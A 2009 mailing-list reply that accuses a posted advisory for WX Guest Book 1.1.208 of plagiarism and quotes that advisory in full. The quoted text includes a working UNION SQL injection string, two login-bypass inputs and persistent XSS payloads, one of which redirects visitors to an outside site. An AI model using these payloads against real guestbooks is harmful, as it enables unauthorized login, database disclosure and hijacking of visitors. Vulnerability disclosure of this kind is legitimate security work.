Completely stolen/copied. http://packetstormsecurity.org/0909-exploits/wxguestbook-sqlxss.txt 29598ed23c2831346a48aeb6fbdb3605 WX Guest Book version 1.1.208 suffers from remote SQL injection and cross site scripting vulnerabilities. Authored By <a href="mailto:damagicalhacker[at]gmail.com";>learn3r</a>
On Sun, Dec 13, 2009 at 12:45:17PM -0000, [email protected] wrote: > ########################################### > # WX Guest Book 1.1.208 Vulns # > # By xxHackerXzX hacker from nepal # > # [email protected] # > ########################################### > > Product name: WX Guestbook 1.1.208 > Product vendor: http://www.ekin0x.com/r57.txt > > This product suffers from multiple SQLi and persistent XSS vuln. > > ############## SQL Search Vuln ############### > > The search parameters/queries we submit to the search.php are unsanitized and > hence this can be compromised to SQLinject the server. > > SQL query: > $signs = DB_Execute("SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '%" . > $QUERY . "%') ORDER BY `code` DESC"); > > The $QUERY is what we submit through search box so injecting this will sql > inject the server. > The following is the sample sql injection example. > > > Sample search string: test%') UNION ALL SELECT > 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/* > > ############## SQL login bypass ############### > The username and password fields are unsanitized and hence we can bypass the > login systems. > > Username: admin'))/* > Password: learn3r [or whatever] > > Or > > Username: ')) or 1=1/* > Password: learn3r [or whatever] > > ############## Persistent XSS Vulns ############## > > In the name field (I suppose as I don't understand arabic), you can inject > XSS... > <script>alert(String.fromCharCode(97));</script> > <script>location.replace("http://www.ekin0x.com";)</script>
